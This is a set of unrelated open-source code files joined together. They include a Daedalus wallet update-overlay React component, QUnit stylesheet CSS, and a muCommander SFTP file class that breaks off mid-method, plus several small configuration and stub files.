'appUpdate.overlay.title', defaultMessage: '!!!Software update available!', description: '"title" for the App Update Overlay', }, subtitle: { id: 'appUpdate.overlay.subtitle', defaultMessage: '!!!You are currently running Daedalus version {currentAppVersion}.<br />Daedalus version {availableAppVersion} is now available to download.', description: '"subtitle" for the App Update Overlay', }, checkboxLabel: { id: 'appUpdate.overlay.checkboxLabel', defaultMessage: '!!!I understand that I need to complete the installation before starting Daedalus.', description: '"checkboxLabel" for the App Update Overlay', }, buttonLaunchInstallerLabel: { id: 'appUpdate.overlay.button.launchInstaller.label', defaultMessage: '!!!Quit Daedalus and start the installation', description: '"buttonLaunchInstallerLabel" for the App Update Overlay', }, buttonInstallUpdateLabel: { id: 'appUpdate.overlay.button.installUpdate.label', defaultMessage: '!!!Install the update and restart Daedalus', description: '"buttonInstallUpdateLabel" for the App Update Overlay', }, postponeInstallLinkLabel: { id: 'appUpdate.overlay.postponeInstall.link.label', defaultMessage: '!!!Postpone the update', description: '"manualUpdateLinkLabel" for the App Update Overlay', }, installingUpdateLabel: { id: 'appUpdate.overlay.installingUpdate.link.label', defaultMessage: '!!!Installing update...', description: '"installingUpdateLabel" for the App Update Overlay', }, downloadProgressLabel: { id: 'appUpdate.overlay.downloadProgressLabel', defaultMessage: '!!!Download in progress', description: '"downloadProgressLabel" for the App Update Overlay', }, downloadTimeLeft: { id: 'appUpdate.overlay.downloadTimeLeft', defaultMessage: '!!!{downloadTimeLeft} left', description: '"downloadTimeLeft" for the App Update Overlay', }, downloadProgressData: { id: 'appUpdate.overlay.downloadProgressData', defaultMessage: '!!!({totalDownloaded} of {totalDownloadSize} downloaded)', description: '"downloadProgressData" for the App Update Overlay', }, manualUpdateDescriptionError: { id: 'appUpdate.overlay.manualUpdate.description.error', defaultMessage: '!!!We were unable to launch the update installer automatically.', description: '"manualUpdateDescriptionError" for the App Update Overlay', }, manualUpdateDescriptionErrorLinux: { id: 'appUpdate.overlay.manualUpdate.description.errorLinux', defaultMessage: '!!!We were unable to install the update.', description: '"manualUpdateDescriptionErrorLinux" for the App Update Overlay', }, manualUpdateDescriptionAction: { id: 'appUpdate.overlay.manualUpdate.description.action', defaultMessage: '!!!Please manually update Daedalus to its latest version.', description: '"manualUpdateDescriptionAction" for the App Update Overlay', }, manualUpdateButtonLabel: { id: 'appUpdate.overlay.manualUpdate.button.label', defaultMessage: '!!!Follow instructions and manually update', description: '"manualUpdateButtonLabel" for the App Update Overlay', }, manualUpdateButtonUrl: { id: 'appUpdate.overlay.manualUpdate.button.url', defaultMessage: '!!!https://daedaluswallet.io/en/download/', description: '"manualUpdateButtonUrl" for the App Update Overlay', }, }); type Props = { update: News.News, onClose: Function, downloadTimeLeft: string, totalDownloaded: string, totalDownloadSize: string, availableAppVersion: string, currentAppVersion: string, downloadProgress: number, isUpdateDownloaded: boolean, isAutomaticUpdateFailed: boolean, isWaitingToQuitDaedalus: boolean, onInstallUpdate: Function, onExternalLinkClick: Function, onPostponeUpdate: Function, installationProgress: number, isLinux: boolean, }; type State = { areTermsOfUseAccepted: boolean, }; @observer export default class AppUpdateOverlay extends Component<Props, State> { static contextTypes = { intl: intlShape.isRequired, }; state = { areTermsOfUseAccepted: false, }; toggleAcceptance = () => { this.setState(prevState => ({ areTermsOfUseAccepted: !prevState.areTermsOfUseAccepted, })); }; contentClickHandler(event: SyntheticMouseEvent<HTMLElement>) { const linkUrl = get(event, ['target', 'href']); if (linkUrl) { event.preventDefault(); event.stopPropagation(); this.props.onExternalLinkClick(linkUrl); } } progressActions = () => { const { intl } = this.context; const { downloadTimeLeft, totalDownloaded, totalDownloadSize, downloadProgress, } = this.props; return ( <div className={styles.downloadProgress}> <div className={styles.downloadProgressContent}> <p className={styles.downloadProgressLabel}> {intl.formatMessage(messages.downloadProgressLabel)} </p> <p className={styles.downloadProgressData}> <b> {intl.formatMessage(messages.downloadTimeLeft, { downloadTimeLeft, })} </b>{' '} {intl.formatMessage(messages.downloadProgressData, { totalDownloaded, totalDownloadSize, })} </p> </div> <ProgressBarLarge progress={downloadProgress} /> </div> ); }; openInstallerAction = () => { const { intl } = this.context; const { onInstallUpdate, onPostponeUpdate, isWaitingToQuitDaedalus, isLinux, installationProgress, } = this.props; const { areTermsOfUseAccepted } = this.state; const isCheckboxDisabled = isWaitingToQuitDaedalus; const checkboxStyles = classnames([ styles.checkbox, isCheckboxDisabled ? styles.disabled : null, ]); const isButtonDisabled = !areTermsOfUseAccepted || isWaitingToQuitDaedalus; const buttonStyles = classnames([ styles.button, isButtonDisabled ? styles.disabled : null, isWaitingToQuitDaedalus ? styles.installing : null, ]); const buttonLabel = isLinux ? messages.buttonInstallUpdateLabel : messages.buttonLaunchInstallerLabel; const postponeLinkStyles = classnames([ styles.postponeLink, !isLinux && isWaitingToQuitDaedalus ? styles.disabled : null, isLinux && isWaitingToQuitDaedalus ? styles.noLink : null, ]); const postponeLabel = isLinux && isWaitingToQuitDaedalus ? messages.installingUpdateLabel : messages.postponeInstallLinkLabel; const postponeAction = !isWaitingToQuitDaedalus ? onPostponeUpdate : () => {}; const actionsStyles = classnames([ styles.actions, isLinux && isWaitingToQuitDaedalus ? styles.progressBar : null, ]); return ( <div className={actionsStyles}> {!(isLinux && isWaitingToQuitDaedalus) && ( <> <Checkbox label={intl.formatMessage(messages.checkboxLabel)} onChange={this.toggleAcceptance} className={checkboxStyles} checked={areTermsOfUseAccepted || isWaitingToQuitDaedalus} skin={CheckboxSkin} themeOverrides={styles.checkbox} disabled={isCheckboxDisabled} /> <Button className={buttonStyles} onClick={onInstallUpdate} skin={ButtonSpinnerSkin} loading={isWaitingToQuitDaedalus} label={intl.formatMessage(buttonLabel)} disabled={isButtonDisabled} /> <Link className={postponeLinkStyles} onClick={postponeAction} label={intl.formatMessage(postponeLabel)} skin={LinkSkin} hasIconAfter={false} /> </> )} {isLinux && isWaitingToQuitDaedalus && ( <> <div className={styles.downloadProgressContent}> <p className={styles.downloadProgressLabel}> {intl.formatMessage(messages.installingUpdateLabel)} </p> </div> <ProgressBarLarge progress={installationProgress} /> </> )} </div> ); }; manualUpdateAction = () => { const { intl } = this.context; const { onExternalLinkClick, onPostponeUpdate, isLinux } = this.props; const errorMessage = isLinux ? messages.manualUpdateDescriptionErrorLinux : messages.manualUpdateDescriptionError; return ( <div className={styles.actions}> <div className={styles.manualUpdateDescription}> {intl.formatMessage(errorMessage)} {intl.formatMessage(messages.manualUpdateDescriptionAction)} </div> <Button className={styles.button} onClick={() => onExternalLinkClick( intl.formatMessage(messages.manualUpdateButtonUrl) ) } skin={ButtonSkin} label={ <span> <SVGInline svg={externalLinkIcon} className={styles.externalLinkIcon} /> {intl.formatMessage(messages.manualUpdateButtonLabel)} </span> } /> <Link className={styles.postponeLink} onClick={onPostponeUpdate} label={intl.formatMessage(messages.postponeInstallLinkLabel)} skin={LinkSkin} hasIconAfter={false} /> </div> ); }; render() { const { intl } = this.context; const { update, onClose, isUpdateDownloaded, availableAppVersion, currentAppVersion, isAutomaticUpdateFailed, } = this.props; const { content } = update; let actions; if (isAutomaticUpdateFailed) actions = this.manualUpdateAction(); else if (!isUpdateDownloaded) actions = this.progressActions(); else actions = this.openInstallerAction(); return ( <div className={styles.component} role="presentation" onClick={!isUpdateDownloaded ? onClose : () => {}} > {!isUpdateDownloaded && !isAutomaticUpdateFailed && ( <DialogCloseButton onClose={onClose} className={styles.closeButton} /> )} <h1 className={styles.title}>{intl.formatMessage(messages.title)}</h1> <span className={styles.subtitle}> <FormattedHTMLMessage {...messages.subtitle} values={{ availableAppVersion, currentAppVersion, }} /> </span> <div className={styles.content} role="presentation" onClick={this.contentClickHandler.bind(this)} > <ReactMarkdown escapeHtml={false} source={content} /> </div> {actions} </div> ); } }
{ "pile_set_name": "Github" }
# ------------------------------------------------------------------------------- # Copyright IBM Corp. 2017 # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ------------------------------------------------------------------------------- from pixiedust.utils.environment import Environment from pixiedust.display.streaming import StreamingDataAdapter import pixiedust.utils.dataFrameMisc as dataFrameMisc from .jsonDataHandler import JSONDataHandler from .pandasDataFrameHandler import PandasDataFrameDataHandler if Environment.hasSpark: from .pysparkDataFrameHandler import PySparkDataFrameDataHandler def isArrayOfDict(entity): if not isinstance(entity, list): return False return all([isinstance(x, dict) for x in entity]) def getDataHandler(options, entity): if dataFrameMisc.isPySparkDataFrame(entity): return PySparkDataFrameDataHandler(options, entity) elif dataFrameMisc.isPandasDataFrame(entity): return PandasDataFrameDataHandler(options, entity) elif isinstance(entity, dict) or isArrayOfDict(entity): return JSONDataHandler(options, entity) elif isinstance(entity, StreamingDataAdapter): return entity.getDisplayDataHandler(options, entity) return None
{ "pile_set_name": "Github" }
#import <Foundation/Foundation.h> @interface PodsDummy_AEXML : NSObject @end @implementation PodsDummy_AEXML @end
{ "pile_set_name": "Github" }
package cn.thinkjoy.utils4s.file import better.files._ import java.io.{File=>JFile} /** * Hello world! * */ object FileApp{ def main(args: Array[String]) { //TODO println("需要java8,需要继续跟") } }
{ "pile_set_name": "Github" }
<vector xmlns:android="http://schemas.android.com/apk/res/android" android:width="24dp" android:height="24dp" android:viewportWidth="24.0" android:viewportHeight="24.0"> <path android:fillColor="#FF000000" android:pathData="M16.5,12c0,-1.77 -1.02,-3.29 -2.5,-4.03v2.21l2.45,2.45c0.03,-0.2 0.05,-0.41 0.05,-0.63zM19,12c0,0.94 -0.2,1.82 -0.54,2.64l1.51,1.51C20.63,14.91 21,13.5 21,12c0,-4.28 -2.99,-7.86 -7,-8.77v2.06c2.89,0.86 5,3.54 5,6.71zM4.27,3L3,4.27 7.73,9L3,9v6h4l5,5v-6.73l4.25,4.25c-0.67,0.52 -1.42,0.93 -2.25,1.18v2.06c1.38,-0.31 2.63,-0.95 3.69,-1.81L19.73,21 21,19.73l-9,-9L4.27,3zM12,4L9.91,6.09 12,8.18L12,4z"/> </vector>
{ "pile_set_name": "Github" }
// // Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. // .NetBeans IDE Tutorials ************************************************ - link:index_ru.html[NetBeans IDE Tutorials] - link:section_ru.html[] - link:github_nb_screencast_ru.html[Видеоролик о настройке репозитория GitHub при помощи IDE NetBeans] - link:clearcase_ru.html[Использование поддержки ClearCase в IDE NetBeans] - link:cvs_ru.html[Использование поддержки CVS в IDE NetBeans] - link:git_ru.html[Использование поддержки Git в IDE NetBeans] - link:mercurial-queues_ru.html[Использование поддержки Mercurial Queues в IDE NetBeans] - link:mercurial_ru.html[Использование поддержки Mercurial в IDE NetBeans] - link:subversion_ru.html[Использование поддержки Subversion в IDE NetBeans] - link:install-and-configure-mysql-server_ru.html[Настройка сервера баз данных MySQL в операционной системе Windows] - link:overview-screencast_ru.html[Обзор IDE NetBeans 8.0] - link:mysql_ru.html[Подключение к базе данных MySQL] - link:java-db_ru.html[Работа с базой данных Java DB (Derby)] - link:team-servers_ru.html[Работа с сервером групповой работы в IDE NetBeans] - link:oracle-db_ru.html[Соединение с базой данных Oracle из IDE NetBeans] - link:platform-screencast_ru.html[Создание приложений на платформе NetBeans 6.9] - link:database-improvements-screencast_ru.html[Экранная демонстрация: поддержка баз данных в IDE NetBeans] ************************************************
{ "pile_set_name": "Github" }
################################################################################ # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ################################################################################ welcome = \ \n\ \u001B[1m Custom Karaf Branding Example\u001B[0m (${project.version})\n\ \n\ Hit '\u001B[1m<tab>\u001B[0m' for a list of available commands\n\ and '\u001B[1m[cmd] --help\u001B[0m' for help on a specific command.\n
{ "pile_set_name": "Github" }
package openapi3 import ( "github.com/getkin/kin-openapi/jsoninfo" ) // Example is specified by OpenAPI/Swagger 3.0 standard. type Example struct { ExtensionProps Summary string `json:"summary,omitempty"` Description string `json:"description,omitempty"` Value interface{} `json:"value,omitempty"` ExternalValue string `json:"externalValue,omitempty"` } func NewExample(value interface{}) *Example { return &Example{ Value: value, } } func (example *Example) MarshalJSON() ([]byte, error) { return jsoninfo.MarshalStrictStruct(example) } func (example *Example) UnmarshalJSON(data []byte) error { return jsoninfo.UnmarshalStrictStruct(data, example) }
{ "pile_set_name": "Github" }
$NetBSD: patch-scores.c,v 1.1 2013/10/10 00:07:23 joerg Exp $ --- scores.c.orig 2013-10-09 23:15:30.000000000 +0000 +++ scores.c @@ -159,11 +159,12 @@ void writecurscore(int col) void drawscores(void) { writenum(scdat[0].score,0,0,6,3); - if (nplayers==2 || diggers==2) + if (nplayers==2 || diggers==2) { if (scdat[1].score<100000l) writenum(scdat[1].score,236,0,6,3); else writenum(scdat[1].score,248,0,6,3); + } } void addscore(int n,Sint4 score)
{ "pile_set_name": "Github" }
/*! * QUnit 1.16.0 * http://qunitjs.com/ * * Copyright 2006, 2014 jQuery Foundation and other contributors * Released under the MIT license * http://jquery.org/license * * Date: 2014-12-03T16:32Z */ /** Font Family and Sizes */ #qunit-tests, #qunit-header, #qunit-banner, #qunit-testrunner-toolbar, #qunit-userAgent, #qunit-testresult { font-family: "Helvetica Neue Light", "HelveticaNeue-Light", "Helvetica Neue", Calibri, Helvetica, Arial, sans-serif; } #qunit-testrunner-toolbar, #qunit-userAgent, #qunit-testresult, #qunit-tests li { font-size: small; } #qunit-tests { font-size: smaller; } /** Resets */ #qunit-tests, #qunit-header, #qunit-banner, #qunit-userAgent, #qunit-testresult, #qunit-modulefilter { margin: 0; padding: 0; } /** Header */ #qunit-header { padding: 0.5em 0 0.5em 1em; color: #8699A4; background-color: #0D3349; font-size: 1.5em; line-height: 1em; font-weight: 400; border-radius: 5px 5px 0 0; } #qunit-header a { text-decoration: none; color: #C2CCD1; } #qunit-header a:hover, #qunit-header a:focus { color: #FFF; } #qunit-testrunner-toolbar label { display: inline-block; padding: 0 0.5em 0 0.1em; } #qunit-banner { height: 5px; } #qunit-testrunner-toolbar { padding: 0.5em 1em 0.5em 1em; color: #5E740B; background-color: #EEE; overflow: hidden; } #qunit-userAgent { padding: 0.5em 1em 0.5em 1em; background-color: #2B81AF; color: #FFF; text-shadow: rgba(0, 0, 0, 0.5) 2px 2px 1px; } #qunit-modulefilter-container { float: right; } /** Tests: Pass/Fail */ #qunit-tests { list-style-position: inside; } #qunit-tests li { padding: 0.4em 1em 0.4em 1em; border-bottom: 1px solid #FFF; list-style-position: inside; } #qunit-tests > li { display: none; } #qunit-tests li.pass, #qunit-tests li.running, #qunit-tests li.fail { display: list-item; } #qunit-tests.hidepass li.pass, #qunit-tests.hidepass li.running { display: none; } #qunit-tests li strong { cursor: pointer; } #qunit-tests li.skipped strong { cursor: default; } #qunit-tests li a { padding: 0.5em; color: #C2CCD1; text-decoration: none; } #qunit-tests li a:hover, #qunit-tests li a:focus { color: #000; } #qunit-tests li .runtime { float: right; font-size: smaller; } .qunit-assert-list { margin-top: 0.5em; padding: 0.5em; background-color: #FFF; border-radius: 5px; } .qunit-collapsed { display: none; } #qunit-tests table { border-collapse: collapse; margin-top: 0.2em; } #qunit-tests th { text-align: right; vertical-align: top; padding: 0 0.5em 0 0; } #qunit-tests td { vertical-align: top; } #qunit-tests pre { margin: 0; white-space: pre-wrap; word-wrap: break-word; } #qunit-tests del { background-color: #E0F2BE; color: #374E0C; text-decoration: none; } #qunit-tests ins { background-color: #FFCACA; color: #500; text-decoration: none; } /*** Test Counts */ #qunit-tests b.counts { color: #000; } #qunit-tests b.passed { color: #5E740B; } #qunit-tests b.failed { color: #710909; } #qunit-tests li li { padding: 5px; background-color: #FFF; border-bottom: none; list-style-position: inside; } /*** Passing Styles */ #qunit-tests li li.pass { color: #3C510C; background-color: #FFF; border-left: 10px solid #C6E746; } #qunit-tests .pass { color: #528CE0; background-color: #D2E0E6; } #qunit-tests .pass .test-name { color: #366097; } #qunit-tests .pass .test-actual, #qunit-tests .pass .test-expected { color: #999; } #qunit-banner.qunit-pass { background-color: #C6E746; } /*** Failing Styles */ #qunit-tests li li.fail { color: #710909; background-color: #FFF; border-left: 10px solid #EE5757; white-space: pre; } #qunit-tests > li:last-child { border-radius: 0 0 5px 5px; } #qunit-tests .fail { color: #000; background-color: #EE5757; } #qunit-tests .fail .test-name, #qunit-tests .fail .module-name { color: #000; } #qunit-tests .fail .test-actual { color: #EE5757; } #qunit-tests .fail .test-expected { color: #008000; } #qunit-banner.qunit-fail { background-color: #EE5757; } /*** Skipped tests */ #qunit-tests .skipped { background-color: #EBECE9; } #qunit-tests .qunit-skipped-label { background-color: #F4FF77; display: inline-block; font-style: normal; color: #366097; line-height: 1.8em; padding: 0 0.5em; margin: -0.4em 0.4em -0.4em 0; } /** Result */ #qunit-testresult { padding: 0.5em 1em 0.5em 1em; color: #2B81AF; background-color: #D2E0E6; border-bottom: 1px solid #FFF; } #qunit-testresult .module-name { font-weight: 700; } /** Fixture */ #qunit-fixture { position: absolute; top: -10000px; left: -10000px; width: 1000px; height: 1000px; }
{ "pile_set_name": "Github" }
/** * This file is part of muCommander, http://www.mucommander.com * * muCommander is free software; you can redistribute it and/or modify * it under the terms of the GNU Lesser General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * muCommander is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package com.mucommander.commons.file.protocol.sftp; import java.io.FilterInputStream; import java.io.FilterOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.util.ArrayList; import java.util.Collections; import java.util.List; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.jcraft.jsch.ChannelSftp; import com.jcraft.jsch.ChannelSftp.LsEntry; import com.jcraft.jsch.SftpATTRS; import com.jcraft.jsch.SftpException; import com.mucommander.commons.file.AbstractFile; import com.mucommander.commons.file.AuthException; import com.mucommander.commons.file.FileFactory; import com.mucommander.commons.file.FileOperation; import com.mucommander.commons.file.FilePermissions; import com.mucommander.commons.file.FileURL; import com.mucommander.commons.file.PermissionAccess; import com.mucommander.commons.file.PermissionBits; import com.mucommander.commons.file.PermissionType; import com.mucommander.commons.file.SimpleFilePermissions; import com.mucommander.commons.file.SyncedFileAttributes; import com.mucommander.commons.file.UnsupportedFileOperation; import com.mucommander.commons.file.UnsupportedFileOperationException; import com.mucommander.commons.file.connection.ConnectionHandler; import com.mucommander.commons.file.connection.ConnectionPool; import com.mucommander.commons.file.protocol.FileProtocols; import com.mucommander.commons.file.protocol.ProtocolFile; import com.mucommander.commons.io.ByteCounter; import com.mucommander.commons.io.ByteUtils; import com.mucommander.commons.io.CounterOutputStream; import com.mucommander.commons.io.RandomAccessInputStream; import com.mucommander.commons.io.RandomAccessOutputStream; /** * SFTPFile provides access to files located on an SFTP server. * * <p>The associated {@link FileURL} scheme is {@link FileProtocols#SFTP}. The host part of the URL designates the * SFTP server. Credentials must be specified in the login and password parts as SFTP servers require a login and * password. The path separator is <code>'/'</code>.</p> * * <p>Here are a few examples of valid SFTP URLs: * <code> * sftp://server/pathto/somefile<br> * sftp://login:password@server/pathto/somefile<br> * </code> * </p> * * <p>Internally, SFTPFile uses {@link ConnectionPool} to create SFTP connections as needed and allows them to be * reused by SFTPFile instances located on the same server, dealing with concurrency issues. Connections are * thus managed transparently and need not be manually managed.</p> * * <p>Low-level SFTP implementation is provided by the <code>JSCH</code> library distributed under the BSD license.</p> * * @see ConnectionPool * @author Maxence Bernard, Arik Hadas */ public class SFTPFile extends ProtocolFile { private static final Logger LOGGER = LoggerFactory.getLogger(SFTPFile.class); /** The absolute path to the file on the remote server, not the full URL */ private String absPath; /** Contains the file attribute values */ private SFTPFileAttributes fileAttributes; /** Cached parent file instance, null if not created yet or if this file has no parent */ private AbstractFile parent; /** Has the parent file been determined yet? */ private boolean parentValSet; /** Cached canonical path value, null if the canonical path hasn't been fetched yet */ private String canonicalPath; /** Timestamp when the canonical path value was fetched */ private long canonicalPathFetchedTime; /** Period of time during which file attributes are cached, before being fetched again from the server. */ private static long attributeCachingPeriod = 60000; /** a SFTPConnectionHandlerFactory instance */ private final static SFTPConnectionHandlerFactory connHandlerFactory = new SFTPConnectionHandlerFactory(); /** Name of the property that holds the path to a private key. This property is optional; if it is set, private key * authentication is used. */ public final static String PRIVATE_KEY_PATH_PROPERTY_NAME = "privateKeyPath"; private final static String SEPARATOR = DEFAULT_SEPARATOR; /** * Creates a new instance of SFTPFile and initializes the SSH/SFTP connection to the server. */ protected SFTPFile(FileURL fileURL) throws IOException { this(fileURL, null); } protected SFTPFile(FileURL fileURL, SFTPFileAttributes fileAttributes) throws IOException { super(fileURL); // // Throw an AuthException if the url doesn't contain any credentials // if(!fileURL.containsCredentials()) // throw new AuthException(fileURL); this.absPath = fileURL.getPath(); if(fileAttributes==null) this.fileAttributes = new SFTPFileAttributes(fileURL); else this.fileAttributes = fileAttributes; } /** * Sets the time period during which attributes values (e.g. isDirectory, last modified, ...) are cached. * The higher this value, the lower the number of network requests but also the longer it takes * before those attributes can be refreshed. A value of <code>0</code> disables attributes caching. * * <p>This class ensures that the attributes changed remotely by one of its methods are always updated locally, even * with attributes caching enabled. To illustrate, after a call to {@link #mkdir()}, {@link #isDirectory()} will * return <code>true</code>, even if the attributes haven't been refreshed. The attributes will however not be * consistent if they have been changed by another {@link SFTPFile} or by another process, and will remain * inconsistent for up to <code>period</code> milliseconds. * * @param period time period during which attributes values are cached, in milliseconds. 0 disables attributes caching. */ public static void setAttributeCachingPeriod(long period) { attributeCachingPeriod = period; } private OutputStream getOutputStream(boolean append) throws IOException { // Retrieve a ConnectionHandler and lock it final SFTPConnectionHandler connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); try { // Makes sure the connection is started, if not starts it connHandler.checkConnection(); OutputStream outputStream; if(exists()) { outputStream = connHandler.channelSftp.put(absPath, append ? ChannelSftp.APPEND : ChannelSftp.OVERWRITE); // Update local attributes if(!append) fileAttributes.setSize(0); } else { outputStream = connHandler.channelSftp.put(absPath); // Update local attributes fileAttributes.setExists(true); fileAttributes.setDate(System.currentTimeMillis()); fileAttributes.setSize(0); } return new CounterOutputStream( new SFTPOutputStream(outputStream, connHandler), new ByteCounter() { @Override public synchronized void add(long nbBytes) { fileAttributes.addToSize(nbBytes); fileAttributes.setDate(System.currentTimeMillis()); } } ); } catch(IOException e) { // Release the lock on the ConnectionHandler if the OutputStream could not be created connHandler.releaseLock(); // Re-throw IOException throw e; } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); return null; } } ///////////////////////////////////////////// // ConnectionHandlerFactory implementation // ///////////////////////////////////////////// public ConnectionHandler createConnectionHandler(FileURL location) { return new SFTPConnectionHandler(location); } ///////////////////////////////// // AbstractFile implementation // ///////////////////////////////// /** * Implementation note: the value returned by this method will always be <code>false</code> if this file was * created by the public constructor. If this file was created by the private constructor (by {@link #ls()}, * the value will be accurate (<code>true</code> if this file is a symlink) but will never get updated. * See {@link com.mucommander.commons.file.protocol.sftp.SFTPFile.SFTPFileAttributes} for more information. */ @Override public boolean isSymlink() { return fileAttributes.isSymlink(); } @Override public boolean isSystem() { return false; } /** * Implementation note: for symlinks, returns the date of the link's target. */ @Override public long getDate() { return ((SFTPFileAttributes)getCanonicalFile().getUnderlyingFileObject()).getDate(); } @Override public void changeDate(long lastModified) throws IOException, UnsupportedFileOperationException { SFTPConnectionHandler connHandler = null; try { // Retrieve a ConnectionHandler and lock it connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); connHandler.channelSftp.setMtime(absPath, (int)(lastModified/1000)); // Update local attribute copy fileAttributes.setDate(lastModified); } catch (SftpException e) { LOGGER.error("failed to change the modification date of " + absPath, e); } finally { // Release the lock on the ConnectionHandler if(connHandler!=null) connHandler.releaseLock(); } } /** * Implementation note: for symlinks, returns the size of the link's target. */ @Override public long getSize() { return ((SFTPFileAttributes)getCanonicalFile().getUnderlyingFileObject()).getSize(); } @Override public AbstractFile getParent() { if(!parentValSet) { FileURL parentFileURL = this.fileURL.getParent(); if(parentFileURL!=null) { parent = FileFactory.getFile(parentFileURL); // Note: parent may be null if it can't be resolved } parentValSet = true; } return parent; } @Override public void setParent(AbstractFile parent) { this.parent = parent; this.parentValSet = true; } /** * Implementation note: for symlinks, returns the value of the link's target. */ @Override public boolean exists() { return fileAttributes.exists(); } /** * Implementation note: for symlinks, returns the permissions of the link's target. */ @Override public FilePermissions getPermissions() { return ((SFTPFileAttributes)getCanonicalFile().getUnderlyingFileObject()).getPermissions(); } @Override public PermissionBits getChangeablePermissions() { return PermissionBits.FULL_PERMISSION_BITS; // Full permission support (777 octal) } @Override public void changePermission(PermissionAccess access, PermissionType permission, boolean enabled) throws IOException { changePermissions(ByteUtils.setBit(getPermissions().getIntValue(), (permission.toInt() << (access.toInt()*3)), enabled)); } @Override public String getOwner() { return fileAttributes.getOwner(); } @Override public boolean canGetOwner() { return true; } @Override public String getGroup() { return fileAttributes.getGroup(); } @Override public boolean canGetGroup() { return true; } /** * Implementation note: for symlinks, returns the value of the link's target. */ @Override public boolean isDirectory() { return fileAttributes.isDirectory(); } @Override public InputStream getInputStream() throws IOException { return getInputStream(0); } @Override public OutputStream getOutputStream() throws IOException { return getOutputStream(false); } @Override public OutputStream getAppendOutputStream() throws IOException { return getOutputStream(true); } @Override public RandomAccessInputStream getRandomAccessInputStream() throws IOException { return new SFTPRandomAccessInputStream(); } @Override public void delete() throws IOException { // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler connHandler = null; try { // Retrieve a ConnectionHandler and lock it connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); if(isDirectory()) connHandler.channelSftp.rmdir(absPath); else connHandler.channelSftp.rm(absPath); // Update local attributes fileAttributes.setExists(false); fileAttributes.setDirectory(false); fileAttributes.setSymlink(false); fileAttributes.setSize(0); } catch (SftpException e) { e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler if the OutputStream could not be created if(connHandler!=null) connHandler.releaseLock(); } } @SuppressWarnings("unchecked") @Override public AbstractFile[] ls() throws IOException { // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); List<LsEntry> files = new ArrayList<LsEntry>(); try { // Makes sure the connection is started, if not starts it connHandler.checkConnection(); files = connHandler.channelSftp.ls(absPath); } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler connHandler.releaseLock(); } int nbFiles = files.size(); // File doesn't exist, return an empty file array if(nbFiles==0) return new AbstractFile[] {}; AbstractFile children[] = new AbstractFile[nbFiles]; FileURL childURL; String filename; int fileCount = 0; String parentPath = fileURL.getPath(); if(!parentPath .endsWith(SEPARATOR)) parentPath += SEPARATOR; // Fill AbstractFile array and discard '.' and '..' files for (LsEntry file : files) { filename = file.getFilename(); // Discard '.' and '..' files, dunno why these are returned if (filename.equals(".") || filename.equals("..")) continue; childURL = (FileURL) fileURL.clone(); childURL.setPath(parentPath + filename); children[fileCount++] = FileFactory.getFile(childURL, this, Collections.singletonMap("attributes", new SFTPFileAttributes(childURL, file.getAttrs()))); } // Create new array of the exact file count if(fileCount<nbFiles) { AbstractFile newChildren[] = new AbstractFile[fileCount]; System.arraycopy(children, 0, newChildren, 0, fileCount); return newChildren; } return children; } @Override public void mkdir() throws IOException { // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); try { // Makes sure the connection is started, if not starts it connHandler.checkConnection(); connHandler.channelSftp.mkdir(absPath); // Update local attributes fileAttributes.setExists(true); fileAttributes.setDirectory(true); fileAttributes.setDate(System.currentTimeMillis()); fileAttributes.setSize(0); } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler connHandler.releaseLock(); } } /** * Implementation notes: server-to-server renaming will work if the destination file also uses the 'SFTP' scheme * and is located on the same host. */ @Override public void renameTo(AbstractFile destFile) throws IOException { // Throw an exception if the file cannot be renamed to the specified destination. // Fail in situations where SFTPFile#renameTo() does not, for instance when the source and destination are the same. checkRenamePrerequisites(destFile, true, false); // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler 